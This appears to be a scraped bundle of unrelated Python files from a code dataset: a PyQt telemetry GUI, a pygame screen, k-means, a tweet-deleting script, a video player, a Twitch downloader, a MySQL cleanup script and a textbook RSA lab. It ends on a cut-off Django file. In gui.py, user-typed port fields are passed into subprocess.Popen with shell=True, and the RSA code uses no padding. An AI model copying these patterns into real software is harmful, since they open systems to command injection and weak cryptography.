Ui_mainWindow()\r\n self.styleFile = open( \"styles.qss\" ).read()\r\n self.setStyleSheet(self.styleFile)\r\n self.ui.setupUi(self)\r\n self.socketThread = None\r\n #self.show()\r\n self.ui.buttonConnect.clicked.connect(self.openMonitor)\r\n\r\n def openMonitor(self):\r\n print(\"opening\")\r\n self.connectToSerialDevices()\r\n #self.socketThread = None\r\n self.monitor_window = QWidget()\r\n self.monitor_window.setStyleSheet(self.styleFile)\r\n self.monitor = Ui_Monitor()\r\n self.monitor.setupUi(self.monitor_window)\r\n self.monitor_window.show()\r\n self.console = ConsoleWidget()\r\n self.monitor.console.addWidget(self.console)\r\n self.openSockets()\r\n \r\n\r\n def connectToSerialDevices(self):\r\n print(\"connecting to serial devices\")\r\n bd_port = self.ui.bd_port.text()\r\n ub_port = self.ui.ub_port.text()\r\n subprocess.Popen(\"python serial_manager.py {} {}\".format(bd_port, ub_port), shell=True)\r\n #subprocess.Popen(\"{}/serial_manager.py {} {}\".format(os.getcwd(), bd_port, ub_port), shell=True)\r\n #self.mySerialManager = SerialManager(bd_port, ub_port, config.SERIAL_PUBLISH, config.SERIAL_SUBSCRIBE)\r\n #self.mySerialManager.manage()\r\n \r\n def openSockets(self):\r\n print(\"opening sockets\")\r\n try:\r\n context = zmq.Context()\r\n self.telemSocket = context.socket(zmq.SUB)\r\n self.telemSocket.connect(config.GUI_SUBSCRIBE)\r\n self.telemSocket.setsockopt_string(zmq.SUBSCRIBE, '')\r\n \r\n self.commandSocket = context.socket(zmq.PUB)\r\n self.commandSocket.bind(config.GUI_PUBLISH)\r\n print(\"sockets open\")\r\n except (zmq.ZMQError, zmq.ZMQBindError) as err:\r\n print(\"Error: {}\".format(err))\r\n return\r\n \r\n if(self.socketThread is not None):\r\n self.socketThread.terminate()\r\n self.socketThread.socket.close()\r\n\r\n self.socketThread = SocketMonitor(self.telemSocket)\r\n self.socketThread.signal.connect(self.gotSig)\r\n self.socketThread.start()\r\n\r\n def gotSig(self, msg):\r\n #print(\"\\nReceived New Packet...\")\r\n for key in msg:\r\n #print(key)\r\n #print(msg[key][0])\r\n if self.monitor.nff_groupbox.findChild(QLabel, key):\r\n item = self.monitor.nff_groupbox.findChild(QLabel, key)\r\n elif self.monitor.bd_groupbox.findChild(QLabel, key):\r\n item = self.monitor.bd_groupbox.findChild(QLabel, key)\r\n else:\r\n continue\r\n item.setText(str(msg[key][0]))\r\n if msg[key][1] == 1:\r\n item.setStyleSheet('color: #f93943') #red\r\n else:\r\n item.setStyleSheet('color: #063D23') #green\r\n\r\n\r\nclass SocketMonitor(QThread):\r\n signal = pyqtSignal(dict)\r\n def __init__(self,socket):\r\n QThread.__init__(self)\r\n self.socket = socket\r\n\r\n def run(self):\r\n print(\"running\")\r\n while True:\r\n msg = self.socket.recv_pyobj()\r\n #print(msg)\r\n self.signal.emit(msg)\r\n\r\napp = QApplication(sys.argv)\r\nw = AppWindow()\r\n#w.openSockets()\r\n\r\nw.show()\r\n#w.connectToSerialDevices()\r\n\r\nsys.exit(app.exec_())","sub_path":"GSE/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"159124503","text":"from pygame import draw\nfrom pygame import Surface\nfrom pygame import display\nfrom pygame.font import Font\nimport Color\nimport Settings\nimport Text\n\n\nclass Screen(object):\n TOP_LEFT = 0\n CENTER = 1\n\n def __init__(self, surface, fps_clock):\n self.surface = surface\n self.fps_clock = fps_clock\n\n def draw_text_screen(self, text, color, over=True, shadow=False, shadow_color=Color.GRAY, text_dist=50):\n if over:\n self.surface.fill(Color.BG_COLOR)\n font_small = Font(Settings.FONT_NAME, Settings.FONT_SIZE)\n font_large = Font(Settings.FONT_NAME, Settings.FONT_SIZE_LARGE)\n if shadow and shadow_color is not None:\n self.draw_text(text, font_large, shadow_color, Settings.WINDOW_WIDTH / 2 + Settings.SHADOW_OFFSET,\n Settings.WINDOW_HEIGHT / 2 + Settings.SHADOW_OFFSET, Screen.CENTER)\n self.draw_text(text, font_large, color, Settings.WINDOW_WIDTH / 2, Settings.WINDOW_HEIGHT / 2, Screen.CENTER)\n self.draw_text(Text.PRESS_TO_PLAY, font_small, color, Settings.WINDOW_WIDTH / 2,\n Settings.WINDOW_HEIGHT / 2 + text_dist, Screen.CENTER)\n\n @classmethod\n def __draw_text__(cls, text, font, color):\n surface = font.render(text, True, color)\n return surface, surface.get_rect()\n\n def draw_text(self, text, font, color, x, y, coord_type):\n text_surf, text_rect = Screen.__draw_text__(text, font, color)\n if coord_type == Screen.CENTER:\n text_rect.center = x, y\n else:\n text_rect.topleft = x, y\n self.surface.blit(text_surf, text_rect)\n\n def draw_buttons(self):\n left_x = Settings.WINDOW_WIDTH / 2 - Settings.BUTTON_SIZE - Settings.BUTTON_GAP_SIZE / 2\n up_y = Settings.WINDOW_HEIGHT / 2 - Settings.BUTTON_SIZE - Settings.BUTTON_GAP_SIZE / 2\n right_x = Settings.WINDOW_WIDTH / 2 + Settings.BUTTON_GAP_SIZE / 2\n down_y = Settings.WINDOW_HEIGHT / 2 + Settings.BUTTON_GAP_SIZE / 2\n centers = [(left_x, up_y), (right_x, up_y), (left_x, down_y), (right_x, down_y)]\n button_dict = {}\n for _color, center in zip(Color.COLORS, centers):\n button_rect = draw.rect(self.surface, _color,\n (center[0], center[1], Settings.BUTTON_SIZE, Settings.BUTTON_SIZE))\n button_dict[_color] = button_rect\n return button_dict\n\n def draw_button_flash(self, button, color, animation_speed=50):\n orig_surf = self.surface.copy()\n flash_surf = Surface((Settings.BUTTON_SIZE, Settings.BUTTON_SIZE))\n flash_surf = flash_surf.convert_alpha()\n flash_color = Color.COLOR_FLASH_DICT[color]\n r, g, b = flash_color\n for start, end, step in ((0, 255, 1), (255, 0, -1)): # animation loop\n for alpha in range(start, end, animation_speed * step):\n self.surface.blit(orig_surf, (0, 0))\n flash_surf.fill((r, g, b, alpha))\n self.surface.blit(flash_surf, button.topleft)\n display.update()\n self.fps_clock.tick(Settings.FPS)\n self.surface.blit(orig_surf, (0, 0))","sub_path":"Game/Screen.py","file_name":"Screen.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"63874271","text":"import numpy as np\r\n\r\nn=100\r\nk=2 #2列\r\nx=np.linspace(1,100,n) # 生成100个样本的X坐标值\r\ny=np.linspace(101,200,n) # 生成100个样本的Y坐标值\r\ndist = np.zeros([n, k+1]) #line n ,col k,1为标志列,生成n行k+1列的全零矩阵\r\n\r\n#1.选中心\r\ncenter0=np.array([x[0],y[0]])\r\ncenter1=np.array([x[1],y[1]])\r\n#2.求距离\r\nwhile True: #死循环\r\n for i in range(n):\r\n dist[i, 0] = np.sqrt((x[i] - center0[0]) ** 2 + (y[i] - center0[1]) ** 2)\r\n dist[i, 1] = np.sqrt((x[i] - center1[0]) ** 2 + (y[i] - center1[1]) ** 2) # 欧式距离公式\r\n # 3.归类\r\n dist[i,k]=dist[i,:2].argmin() #返回最小值所在的列号\r\n\r\n # 4. 求新类中心\r\n index0 = dist[:, k] == 0 # 筛选0类样本,第k列和0进行比较,=0,则为True\r\n index1 = dist[:, k] == 1 # 筛选1类样本\r\n\r\n center0_new = np.array([x[index0].mean(), y[index0].mean()]) # 新类中心,取返回值为0(True)的平均值\r\n center1_new = np.array([x[index1].mean(), y[index1].mean()])\r\n # 5. 判定是否结束\r\n if sum(center0 == center0_new) + sum(center1 == center1_new) == 4:\r\n break\r\n center0 = center0_new # 更新类中心\r\n center1 = center1_new\r\n\r\nprint(dist)\r\n\r\n\r\n","sub_path":"5.K-means.py","file_name":"5.K-means.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"545659079","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport twitter\r\n\r\napi = twitter.Api(\r\n consumer_key='YOUR_CONSUMER_KEY',\r\n consumer_secret='YOUR_CONSUMER_SECRET',\r\n access_token_key='YOUR_ACCESS_TOKEN_KEY',\r\n access_token_secret='YOUR_ACCESS_TOKEN_SECRET'\r\n)\r\n\r\nscreen_name = 'YOUR_TWITTER_ID'\r\n\r\nwhile True:\r\n statuses = api.GetUserTimeline(screen_name=screen_name)\r\n for s in statuses:\r\n print(s.text, s.created_at)\r\n api.DestroyStatus(s.id)\r\n","sub_path":"src/Tweet Eraser without csv.py","file_name":"Tweet Eraser without csv.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"609717481","text":"for a in range(10):\n print(\"a:\", a)\n for b in range(20):\n print(\"b:\", b)\n if a==5:\n # Break the inner loop...\n break\n else:\n # Continue if the inner loop wasn't broken.\n continue\n # Inner loop was broken, break the outer.\n break","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"376213556","text":"from PyQt5 import QtCore \nfrom PyQt5.QtGui import QImage, QPixmap\nfrom PyQt5.QtCore import QTimer \n\nfrom opencv_engine import opencv_engine\nfrom wongwong_utils import WongWongTimer\n\n# videoplayer_state_dict = {\n# \"stop\":0, \n# \"play\":1,\n# \"pause\":2 \n# }\n\nclass video_controller(object):\n def __init__(self, video_path, ui):\n self.video_path = video_path\n self.ui = ui\n self.qpixmap_fix_width = 800 # 16x9 = 1920x1080 = 1280x720 = 800x450\n self.qpixmap_fix_height = 450\n self.current_frame_no = 0\n self.videoplayer_state = \"pause\"\n self.init_video_info()\n self.set_video_player()\n\n def init_video_info(self):\n videoinfo = opencv_engine.getvideoinfo(self.video_path)\n self.vc = videoinfo[\"vc\"]\n self.video_fps = videoinfo[\"fps\"]\n self.video_total_frame_count = videoinfo[\"frame_count\"]\n self.video_width = videoinfo[\"width\"]\n self.video_height = videoinfo[\"height\"]\n\n self.ui.slider_videoframe.setRange(0, self.video_total_frame_count-1)\n self.ui.slider_videoframe.valueChanged.connect(self.getslidervalue)\n\n\n def set_video_player(self):\n self.timer=QTimer() # init QTimer\n self.timer.timeout.connect(self.timer_timeout_job) # when timeout, do run one\n # self.timer.start(1000//self.video_fps) # start Timer, here we set '1000ms//Nfps' while timeout one time\n self.timer.start(1) # but if CPU can not decode as fast as fps, we set 1 (need decode time)\n\n def set_current_frame_no(self, frame_no):\n self.vc.set(1, frame_no) # bottleneck\n\n #@WongWongTimer\n def __get_next_frame(self):\n ret, frame = self.vc.read()\n self.ui.label_framecnt.setText(f\"frame number: {self.current_frame_no}/{self.video_total_frame_count}\")\n self.setslidervalue(self.current_frame_no)\n return frame\n\n def __update_label_frame(self, frame): \n bytesPerline = 3 * self.video_width\n qimg = QImage(frame, self.video_width, self.video_height, bytesPerline, QImage.Format_RGB888).rgbSwapped()\n self.qpixmap = QPixmap.fromImage(qimg)\n\n if self.qpixmap.width()/16 >= self.qpixmap.height()/9: # like 1600/16 > 90/9, height is shorter, align width\n self.qpixmap = self.qpixmap.scaledToWidth(self.qpixmap_fix_width)\n else: # like 1600/16 < 9000/9, width is shorter, align height\n self.qpixmap = self.qpixmap.scaledToHeight(self.qpixmap_fix_height)\n self.ui.label_videoframe.setPixmap(self.qpixmap)\n # self.ui.label_videoframe.setAlignment(QtCore.Qt.AlignLeft | QtCore.Qt.AlignTop) # up and left\n self.ui.label_videoframe.setAlignment(QtCore.Qt.AlignHCenter | QtCore.Qt.AlignVCenter) # Center\n\n\n def play(self):\n self.videoplayer_state = \"play\"\n\n def stop(self):\n self.videoplayer_state = \"stop\"\n\n def pause(self):\n self.videoplayer_state = \"pause\"\n\n def timer_timeout_job(self):\n if (self.videoplayer_state == \"play\"):\n if self.current_frame_no >= self.video_total_frame_count-1:\n #self.videoplayer_state = \"pause\"\n self.current_frame_no = 0 # auto replay\n self.set_current_frame_no(self.current_frame_no)\n else:\n self.current_frame_no += 1\n\n if (self.videoplayer_state == \"stop\"):\n self.current_frame_no = 0\n self.set_current_frame_no(self.current_frame_no)\n\n if (self.videoplayer_state == \"pause\"):\n self.current_frame_no = self.current_frame_no\n self.set_current_frame_no(self.current_frame_no)\n\n frame = self.__get_next_frame()\n self.__update_label_frame(frame)\n\n def getslidervalue(self):\n self.current_frame_no = self.ui.slider_videoframe.value()\n self.set_current_frame_no(self.current_frame_no)\n\n def setslidervalue(self, value):\n self.ui.slider_videoframe.setValue(self.current_frame_no)\n\n\n\n\n\n\n\n\n","sub_path":"day26_video_player_add_slider_project/video_controller.py","file_name":"video_controller.py","file_ext":"py","file_size_in_byte":3975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"528879575","text":"import requests\nimport sys\nimport json\nimport re\nimport os\nimport string\nimport argparse\n\ndef download_file(url, local_filename):\n print(\"downloading {0}\".format(local_filename))\n CS = 1024\n done = 0\n r = requests.get(url, stream=True)\n with open(local_filename, 'wb') as f:\n for chunk in r.iter_content(chunk_size=CS):\n if not chunk: # filter out keep-alive new chunks\n continue\n f.write(chunk)\n f.flush()\n done += CS\n sys.stdout.write(\"\\r{0:>7.2f} MB\".format(done/float(pow(1024,2))))\n\n\n print(\"done\\n\")\n\ndef download_broadcast(id_):\n\tpattern = \"https://api.twitch.tv/api/channels/{id__}/access_token\"\n\turl = pattern.format(id__=id_)\n\tr = requests.get(url)\n\tif r.status_code != 200:\n\t\traise Exception(\"API returned {0}\".format(r.status_code))\n\ttry:\n\t\tj = r.json()\n\texcept ValueError as e:\n\t\tprint(\"API did not return valid JSON: {}\".format(e))\n\t\tprint(\"{}\".format(r.text))\n\t\tquit()\n\ttemp_token = j['token']\n\ttoken = temp_token.replace(\"\\\\\", \"\")\n\tsig = j['sig']\n\tvideo_url = \"http://usher.twitch.tv/api/channel/hls/\" + id_ + \".m3u8?sig=\" + sig + \"&token=\" + token\n\tprint(video_url)\n\tfilename = id_ + \".m3u8\"\n\tdownload_file(video_url, filename)\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('channel_id', help='twitch channel id')\n args = parser.parse_args()\n download_broadcast(args.channel_id)\n","sub_path":"twitch_live_downloader.py","file_name":"twitch_live_downloader.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"255217668","text":"# this script goes through our training data spreadsheet and moves false positives into the rejectedTrainingData table of our database, rather than the primary front-facing one\nimport csv\nimport MySQLdb\nimport MySQLdb.cursors\nimport os\nfrom tqdm import tqdm\nimport sys\n\n# wrapper function for performing cleanup tasks\n# reads cleanup CSV row by row, grabs article data, deletes the article's images, transfers the data to the rejectedTrainingData table, and then removes the article (and any leftover data) from the primary database\ndef cleanup(c,filename,img_dir):\n with open(filename) as csvfile: # change filename appropriately here\n reader = csv.DictReader(csvfile)\n total = len(list(reader))\n csvfile.seek(0,0)\n reader = csv.DictReader(csvfile)\n for row in tqdm(iterable=reader,desc='Training Data',total=total):\n try:\n if row['Code'] != 'R': # only moving irrelevant articles\n ID = row['Article ID'].strip()\n c.execute(\"\"\"SELECT a.url, title, datetime, article_text, GROUP_CONCAT(DISTINCT keyword) as keywords, GROUP_CONCAT(DISTINCT path) as images \n FROM article A NATURAL JOIN article_keywords NATURAL JOIN keyword_instances LEFT JOIN image I ON A.idArticle = I.idArticle \n WHERE A.idArticle=%s LIMIT 1\"\"\",ID)\n if c.rowcount == 1:\n article = c.fetchone()\n if article['images'] is not None:\n delete_images(img_dir,article['images'])\n t = (article['url'],article['datetime'],article['title'],article['article_text'],article['keywords'],row['Code'].strip())\n c.execute(\"\"\"INSERT INTO rejectedTrainingData(url,datetime,title,text,keywords,code) VALUES (%s,%s,%s,%s,%s,%s)\"\"\",t)\n c.execute(\"\"\"DELETE FROM article WHERE idArticle=%s LIMIT 1\"\"\",(ID,))\n except Exception as e:\n print(e)\n continue\n delete_extra_db(c)\n\n# delete images associated with an irrelevant article\ndef delete_images(img_dir,img_str_list):\n images = img_str_list.split(\",\")\n for i in images:\n abs_image_path = img_dir + i\n if os.path.exists(abs_image_path):\n os.remove(abs_image_path)\n\n# deleting articles often results in keywords and entities that don't belong to any articles and just take up space, so deleting them here\ndef delete_extra_db(c): \n c.execute(\"\"\"DELETE FROM article_keywords WHERE idKey NOT IN (SELECT DISTINCT idKey FROM keyword_instances)\"\"\")\n c.execute(\"\"\"DELETE FROM image_entities WHERE idEntity NOT IN (SELECT DISTINCT idEntity FROM entity_instances)\"\"\")\n\ndef main():\n if len(sys.argv) < 3:\n print(\"Needs CSV and image folder argument (in that order.\")\n else:\n filename = sys.argv[1]\n img_dir = sys.argv[2]\n if img_dir[-1] != \"/\": img_dir += \"/\" # accounting for trailing slash\n db = MySQLdb.connect(host=os.environ['DB_HOST'],port=int(os.environ['DB_PORT']),user=os.environ['DB_USER'],password=os.environ['DB_PASSWORD'],db=\"SupremeCourtApp\",use_unicode=True,charset=\"utf8\")\n db.autocommit(True)\n c = db.cursor(MySQLdb.cursors.DictCursor)\n cleanup(c,filename,img_dir)\nmain()","sub_path":"misc/data_cleanup.py","file_name":"data_cleanup.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"395772921","text":"# -*- coding: utf-8 -*-\nimport time\nimport asyncio\nfrom aiohttp import ClientSession\nfrom .functions import print_app_in_process_time\nfrom .entity import LineRecord\nfrom . import constants as const\n\n\ntime_start = time.time()\n\n\nasync def fetch_and_write_data(item, n):\n async with ClientSession() as session:\n await asyncio.sleep(0.04*n)\n async with session.get(item.url) as response:\n response = await response.json()\n\n if response['status'] == 'OK':\n latitude = response['results'][0]['geometry']['location']['lat']\n longitude = response['results'][0]['geometry']['location']['lng']\n\n item.completed_line = item.line + ';{};{}\\n'.format(\n latitude, longitude\n )\n item.is_done = True\n item.response_status = response['status']\n print_app_in_process_time(\n time_start, 'LineRecord count - {}'.format(n)\n )\n\n\ndef make_part_of_data(part):\n loop = asyncio.get_event_loop()\n tasks = []\n line_instances = []\n stats = ''\n\n with open('source/' + const.csv_file, 'r') as input_file, \\\n open('source/ZIP_' + str(part) + '.txt', 'w+') as output_file:\n lines = input_file.readlines()\n start = (part - 1) * const.REQUESTS_AT_ONCE\n end = part * const.REQUESTS_AT_ONCE \\\n if part != const.TOTAL_PARTS_AMOUNT \\\n else const.REQUESTS_AT_ONCE * (const.TOTAL_PARTS_AMOUNT - 1) + const.REQUESTS_AT_LAST\n print('part :: {}, delta :: {}'.format(part, end - start))\n\n for c in range(1, len(lines)):\n temp = LineRecord(c, lines[c], part)\n line_instances.append(temp)\n\n print_app_in_process_time(time_start, 'LineRecord formed')\n inst_set = list(set(line_instances))\n print(len(inst_set))\n\n stats += '***** PART :: {} *****\\n'.format(part)\n stats += 'Amount of requests :: {}\\n\\n'.format(len(inst_set[start:end]))\n\n for i in range(start, end):\n task = asyncio.ensure_future(\n fetch_and_write_data(inst_set[i], i-start)\n )\n tasks.append(task)\n\n loop.run_until_complete(asyncio.wait(tasks))\n\n success_count = 0\n failed_requests = 0\n failed_requests_info = '\\n\\n'\n\n for i in range(start, end):\n item = inst_set[i]\n\n if item.is_done:\n success_count += 1\n output_file.write(item.completed_line)\n else:\n failed_requests += 1\n if item.response_status == 'OVER_QUERY_LIMIT':\n print(item.url)\n failed_requests_info += '***{};{}\\n'.format(\n item.line, item.response_status\n )\n else:\n failed_requests_info += '{};{}\\n'.format(\n item.line, item.response_status\n )\n\n stats += 'Success count :: {}\\nFailed requests :: {}\\n{}'.format(\n success_count, failed_requests, failed_requests_info\n )\n\n with open('source/ZIP_' + str(part) + '_stats.txt', 'w+') as output_stats:\n output_stats.write(stats)\n\n print_app_in_process_time(time_start, 'It takes')\n\n\ndef combine_parts(num_parts):\n with open('source/ZIP_FULL_INFO.txt', 'w+') as output_file:\n for i in range(1, num_parts + 1):\n with open('source/ZIP_' + str(i) + '.txt', 'r') as input_file:\n lines = input_file.readlines()\n\n for line in lines:\n output_file.write(line)\n\n print_app_in_process_time(time_start, 'It takes')\n","sub_path":"toParse/bin/file_handling.py","file_name":"file_handling.py","file_ext":"py","file_size_in_byte":3712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"466819276","text":"import random\nimport math\nimport requests\nimport json\n\n\ndef NSD(a, b):\n if a == 0:\n return (b, 0, 1)\n else:\n nsd, x, y = NSD(b % a, a)\n return (nsd, y - (b // a) * x, x)\n\n\ndef obratnoe(b, n):\n nsd, x, y = NSD(b, n)\n if nsd == 1:\n return x % n\n\n\ndef primenumber_check(n, k): # Міллер-Рабін\n t = 0\n m = n - 1\n if n == 2 or n == 3:\n return True\n if n % 2 == 0:\n return False\n while m % 2 == 0:\n m = m // 2\n t += 1\n for i in range(k):\n a = random.randrange(2, n - 1)\n u = pow(a, m, n)\n if u == 1:\n continue\n if u == n - 1:\n continue\n j = 1\n while u != -1 and j < t:\n u = pow(u, 2, n)\n if u == n - 1:\n break\n j = j + 1\n else:\n return False\n return True\n\ndef GeneratePrime(n):\n n = n-1\n num=2**n\n i = 1\n while i != n:\n rand = random.randint(0,1)\n num += (2**i)*rand\n i = i + 1\n num += 1\n return num\n\ndef GenerateKeyPair(n):\n while True:\n pair = []\n i = 0\n f = open('log.txt', 'w')\n while i != 2:\n c = GeneratePrime(n)\n if not primenumber_check(c, 10):\n back = False\n while back is False:\n c = GeneratePrime(n)\n if primenumber_check(c, 10):\n pair.append(c)\n i += 1\n back = True\n else:\n f.write(str(hex(c)) + \" isn't prime \\n\")\n return pair\n\n\n\ndef FindOpenKey(p, q):\n n = p * q\n phi = (p - 1) * (q - 1)\n while True:\n e = random.randint(2, phi - 1)\n if math.gcd(e, phi) == 1:\n d = obratnoe(e, phi)\n print(\"n \" + str(hex(n)))\n print(\"e \" + str(hex(e)))\n print(\"d \" + str(hex(d)))\n return n, e, d\n\n\ndef Encrypt(K, e, n):\n return pow(K, e, n)\n\n\ndef Decrypt(K, d, n):\n return pow(K, d, n)\n\n\ndef Sign(K, d, n):\n return pow(K, d, n)\n\n\ndef Verify(K, s, e, n):\n return pow(s, e, n) == K\n\n\ndef SendKey(K, n1, d1, n2, e2):\n print(\"------SENDED KEYS---------\")\n K1 = Encrypt(K, e2, n2)\n print(\"K1 = {}\".format(hex(K1)[2:]))\n S = Sign(K, d1, n1)\n print(\"S = {}\".format(hex(S)[2:]))\n S1 = Encrypt(S, e2, n2)\n print(\"S1 = {}\".format(hex(S1)[2:]))\n\n return K1, S1\n\n\ndef ReceiveKey(eK, S1, n1, e1, n2, d2):\n print(\"------RECIEVED KEYS---------\")\n S = Decrypt(S1, d2, n2)\n K = Decrypt(eK, d2, n2)\n if Verify(K, S, e1, n1):\n print(\"S = {}\".format(hex(S)[2:]))\n print(\"K = {}\".format(hex(K)[2:]))\n return K, S\n\n\nwhile True:\n a = input(\"1.Server / 2.Local?\")\n if a in '2':\n print('\\n' * 100)\n while True:\n pair1 = GenerateKeyPair(512)\n pair2 = GenerateKeyPair(512)\n p, q, p1, q1 = pair1[0], pair1[1], pair2[0], pair2[1]\n if p*q <= p1*q1:\n break\n print(\"p: \" + str(hex(p)), \"q: \" + str(hex(q)), \"p1: \" + str(hex(p1)), \"q1: \" + str(hex(q1)), sep='\\n')\n n1, e1, d1 = FindOpenKey(p, q) # A\n n2, e2, d2 = FindOpenKey(p1, q1) # B\n\n Message = random.randint(0, n1)\n print(\"K: \" + str(hex(Message)[2:]))\n print(d2)\n EncryptedMessage, EncryptedSignature = SendKey(Message, n1, d1, n2, e2)\n ReceiveKey(EncryptedMessage, EncryptedSignature, n1, e1, n2, d2)\n print(\"\\n\" * 3)\n\n if a in '1':\n print('\\n' * 100)\n print('\\n' * 100)\n pair1= GenerateKeyPair(256)\n pair2 = GenerateKeyPair(256)\n p, q = pair1[0], pair1[1]\n p1,q1 = pair2[0],pair2[1]\n n1, e1, d1 = FindOpenKey(p, q) # A\n a = requests.get('http://asymcryptwebservice.appspot.com/rsa/serverKey?keySize=512')\n cookie = a.cookies\n cookie_name = cookie.keys()[0]\n cookie_value = cookie.values()[0]\n a = json.loads(a.text)\n e2 = int(a['publicExponent'], 16)\n n2 = int(a['modulus'], 16)\n print(\"e2: \" + str(hex(e2)))\n print(\"n2: \" + str(hex(n2)))\n while n2 < n1:\n print('\\n'*100)\n pair1 = GenerateKeyPair(256)\n p, q = pair1[0], pair1[1]\n n1, e1, d1 = FindOpenKey(p, q) # A\n Message = random.randint(0, n1)\n print(\"K: \" + str(hex(Message)[2:]))\n EncryptedMessage, EncryptedSignature = SendKey(Message, n1, d1, n2, e2)\n cookie = {cookie_name: cookie_value}\n\n print(\"------RECIEVED KEYS---------\")\n request = \"http://asymcryptwebservice.appspot.com/rsa/receiveKey?key={k}&signature={s}&modulus={n}&publicExponent={e}\".format(\n k=hex(EncryptedMessage)[2:], s=hex(EncryptedSignature)[2:], n=hex(n1)[2:], e=hex(e1)[2:])\n a = json.loads(requests.get(request, cookies=cookie).text)\n\n if a['key'][0] == '0':\n print(\"K: \" + a['key'][1:])\n else:\n print(\"K: \" + a['key'])\n print(\"Verified: \" + str(a['verified']))\n print(\"\\n\" * 3)\n","sub_path":"cp_4/grigoryan_fb84_biletskiy_fb84_cp4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"442724456","text":"# Hyperparameter tuning with GridSearchCV\n# Import necessary modules\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom sklearn.tree import DecisionTreeClassifier\nfrom scipy.stats import randint\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.linear_model import LogisticRegression\n# Setup the hyperparameter grid\nc_space = np.logspace(-5, 8, 15)\nparam_grid = {'C': c_space}\n\n# Instantiate a logistic regression classifier: logreg\nlogreg = LogisticRegression()\n\n# Instantiate the GridSearchCV object: logreg_cv\nlogreg_cv = GridSearchCV(logreg, param_grid, cv=5)\n\n# Fit it to the data\nlogreg_cv.fit(X, y)\n\n# Print the tuned parameters and score\nprint(\"Tuned Logistic Regression Parameters: {}\".format(logreg_cv.best_params_))\nprint(\"Best score is {}\".format(logreg_cv.best_score_))\n\n\n# Hyperparameter tuning with RandomizedSearchCV\n# Import necessary modules\n\n# Setup the parameters and distributions to sample from: param_dist\nparam_dist = {\"max_depth\": [3, None],\n \"max_features\": randint(1, 9),\n \"min_samples_leaf\": randint(1, 9),\n \"criterion\": [\"gini\", \"entropy\"]}\n\n# Instantiate a Decision Tree classifier: tree\ntree = DecisionTreeClassifier()\n\n# Instantiate the RandomizedSearchCV object: tree_cv\ntree_cv = RandomizedSearchCV(tree, param_dist, cv=5)\n\n# Fit it to the data\ntree_cv.fit(X, y)\n\n# Print the tuned parameters and score\nprint(\"Tuned Decision Tree Parameters: {}\".format(tree_cv.best_params_))\nprint(\"Best score is {}\".format(tree_cv.best_score_))\n","sub_path":"Machine Learning Scientist with Python - Track/Supervised Learning with scikit-learn/3. Fine-tuning your model/4_hyperparameter_tunning.py","file_name":"4_hyperparameter_tunning.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"107412416","text":"class APIError(Exception):\n \"\"\"This class allows application code to wrap exceptions so that they\n can be transformed into JSON using the flask exception handler\n hook.\n\n\n :var exception: Wrapped exception if any.\n :var message: Message provided by the caller.\n :var debug: Enable debug mode. Result contains verbose error details.\n :var status_code: Status code provided by the caller. Default: 400.\n\n \"\"\"\n status_code = 400\n\n def __init__(self, message, debug=False, status_code=None, exception=None):\n Exception.__init__(self)\n self.message = message\n self.debug = debug\n if status_code is not None:\n self.status_code = status_code\n self.exception = exception\n\n def to_dict(self):\n \"\"\"Returns a dictionary of values that can be converted to json if\n needed. In debug mode, the wrapped exception is also returned\n as a string.\n\n \"\"\"\n result = dict(message=self.message, success=False)\n if self.debug and self.exception is not None:\n result['exception'] = str(self.exception)\n\n def __str__(self):\n return \"API Error:\" + \", Message: \" + self.message + \"\\n\" \\\n + str(self.exception)\n\n\ndef api_error_handler(exception, debug=False):\n \"\"\"The default error handler. Wraps the exception in an API error object.\n\n :param exception: The exception to wrap.\n :param debug: Enable debug mode. Result contains verbose error details.\n\n \"\"\"\n return APIError('Unable to process this request',\n exception=exception,\n debug=debug)\n","sub_path":"todomvc/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"38848724","text":"def safe_pawns(pawns):\n number=lambda x:int(str(x[1])+str(ord(x[0])-96))\n pair=list(map(number,pawns))\n pair.sort(reverse=True)\n total=0\n for pawn in pair:\n guard=(int(pawn)-9,int(pawn)-11)\n if set(guard)&pair:\n total=total+1\n return total","sub_path":"home/pawn-brotherhood.py","file_name":"pawn-brotherhood.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"616536827","text":"from django.shortcuts import render\nfrom website.models import contato, registro, indicacao, testeNivelamento, respostaNivelamento, perguntasExecutadas\nfrom evento.models import eventoModel\nfrom gerencia.models import perguntaModel, respostaModel\nfrom django.core.mail import EmailMessage\nimport random\nfrom random import shuffle\nimport datetime\nimport os\nfrom twilio.rest import Client\n\n# Create your views here.\n\ndef paginaPrincipal(request):\n 